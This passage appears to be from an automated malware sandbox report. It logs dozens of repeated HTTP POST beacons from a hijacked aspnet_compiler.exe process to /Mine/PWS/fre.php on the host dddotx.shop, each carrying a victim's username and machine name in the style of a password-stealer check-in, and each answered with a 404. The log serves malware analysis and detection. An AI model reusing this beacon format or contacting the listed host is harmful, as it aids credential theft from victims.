                  Sep 25, 2024 15:29:17.230321884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:17.926692009 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5USiq06nU9CvyG6s%2FYmEoxMMTb0IVJl4IF%2BXD9v0uYxicdoUZDFyWBQt9srOnyKJSkhUZ619IvuZrcx2sYo4upqkwrE%2FAceHu%2BuE%2BBkqXP9KLxyoLqf1SRKtkAxhvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cbd4eb918c8-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.455921188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:18.106753111 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:18.111648083 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:18.781105042 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3EU8%2B25wVUKr3ZSxY9sIltURD30coBaEmVUSPH2tqOQ5tWNe1vOLfHKGoCm2ZwXN5enyje19NI01dAP4F3QrxMekdYcM9a%2Bb4%2B231qAjhFtGXLATBehgfOikDDHr9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cc2cfee4387-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.455922188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:18.943695068 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:18.948582888 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:19.609523058 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YH8pWS7ejYbgZXREx2F36uyVO65M4Mkhk3hCbYXiOVjobNHSTgOG%2FPPz%2FKjGK%2ByP6vE1Cznd28RlMy2MD%2B7Dw9oGq9Nu%2BoUvfhqxNAtHbfL%2BO2aybcnkvYHvhapHbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cc7ef8b0f46-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.455923188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:19.780791998 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:19.785847902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:20.495378971 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHozBnsqQW4Ox17iwblUh6J1btJswwpNeBFm8e9Ed8w6LkXnnHL30FLEbXklfh5ZFS81v5g%2FAv%2F8gnCv66S8V20258B7Rqdmj%2FiEKNMZjLi8VX%2BFQ0ctxeRHz%2FIVHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ccd2c911927-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.455924188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:20.652770996 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:20.658124924 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:21.686429024 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cd%2BfFcMh2A%2FZGKQ%2FZaHKDfXXajx3RHwxnh5BdIZV1fZi4Nn8zVydkmHeamxp7AcUMm%2BJDlMQf4wmWb2jWe8jwwBhpMO5CSREM%2FdwPff5QN9vrC%2FentMgTCuhIb1ZAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cd2b9487cf9-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.455925188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:21.871562958 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:21.877332926 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:22.673975945 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XV6BrJcsazT9zE0dwdBUaAGVU2cAo8SuOv9K7gGhstYEZtjJvdiYWt12Lc9VRDSXX%2Fy3RB1U7JRqomkxB0GzptYkbYdXN%2BrkSYEMIDO7rMirXBSvt8QSOvmiK5C%2B9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cda3e9142cf-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.455926188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:22.961080074 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:22.966391087 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:23.753916025 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsATlgmJbQqTrJ4HJ1piEoXJGeObj7OAX7TMIjn1Hzv0jiOjK5kOzY6IIORurRR%2FA8NepUojq9Asm9yXrqwFw0u%2FH7fRKHJGQ9BikCTZoOjN2IhFdm1GqH0d5LaLoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ce10db55e71-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.455927188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:23.923665047 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:23.928498030 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:24.755846024 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1MnEgN0mFEU5Fky3%2Fw5npF1Q1dCugFbxbLCxsOjw5GQuGGBHLPaxIvwXNcB%2BqTYKShTQvrZpWSbCESCEEGU2EMjbzhhPx3OL1RhEHrknEvhZHcFegQFYkLOXdNmgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ce728df8c6f-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.455928188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:24.916723967 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:24.921644926 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:26.878097057 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4BHhqcH%2Fyoa5%2FkRcibFslv2VY0SMK%2Bvznf1Ba1Alrx4Osk12VfRctXkT7WTLvChVhcV2N1k%2BECdRoqk8KrM9XPB6oElPIeqsUjA6u7nGfpcNgm6LR3w3A7nS4Oe4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5ced3c1f15c3-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.455929188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:27.050617933 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:27.055675030 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:27.707496881 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBMJGDhIZ%2F9aSBWnYLvsdnaDT015GCje4O7mFdLQNh7Wg%2BhRx2YZOvqjwSZlzrZS1EAfbtagekv8fiTvwn6nPWU5TalsUlXarTjPjklf%2BLZtCH2eN3KWWpYJDQWhTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cfa9aed8c90-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.455931188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:27.864459991 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:27.870220900 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:28.622564077 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=63zgE5drxHCH9jQ4U4Fw82xXgeWFeMrky00UeX1eY0DkoUmAdh9fJEgaX5OTIQYRkkFsvbi0%2FdotyByksK4fv%2BqBFao0utRgXzEUq4GzfnAymW9iPUpMJcfqVdp8eA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5cffbded4346-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.455932188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:28.937855959 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:28.942773104 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:29.615843058 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6FpLvkziSSC6Eh8wxbf42gNsezX7Xfw2ds4UM%2BGHQZNmsFMlatvtAGS3cHMzDIXHgloaJcLa1plcUvqU%2BI3FgIxgTONLRkg%2FjVHMbL%2BuKhuAqA6a5FBSnDdkLwFEWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d065a124252-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.455933188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:29.772151947 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:29.777252913 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:30.430428028 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=me13Y31WAhmfT9FVxH36LNpfIdG80k8d0p8sXIEwrLroqQRom4ukzBeVF%2FzauvSD1B1f6x8O0N%2Fe9Jk%2BqQkzkGGKQdhtAmE%2FEv8kMAhjCsux1O%2BN3vLMI0J92aFoaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d0b9bb5335a-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.455934188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:30.582592964 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:30.591674089 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:31.557198048 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMzvFkAjBl9JIFzELm1ZTMO13IkZi31yX2isW869fdfrPvf5Dh3QYwgAVPsaLZGKKJ3YJuA1t7r9JGrwGdqdYETW5SWnrCbcid%2BiPsnMMFEruhtLYeJmQ7YM5JNolw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d10bb9b7cfc-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:29:31.559910059 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMzvFkAjBl9JIFzELm1ZTMO13IkZi31yX2isW869fdfrPvf5Dh3QYwgAVPsaLZGKKJ3YJuA1t7r9JGrwGdqdYETW5SWnrCbcid%2BiPsnMMFEruhtLYeJmQ7YM5JNolw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d10bb9b7cfc-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.455935188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:31.899652958 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:31.906769991 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
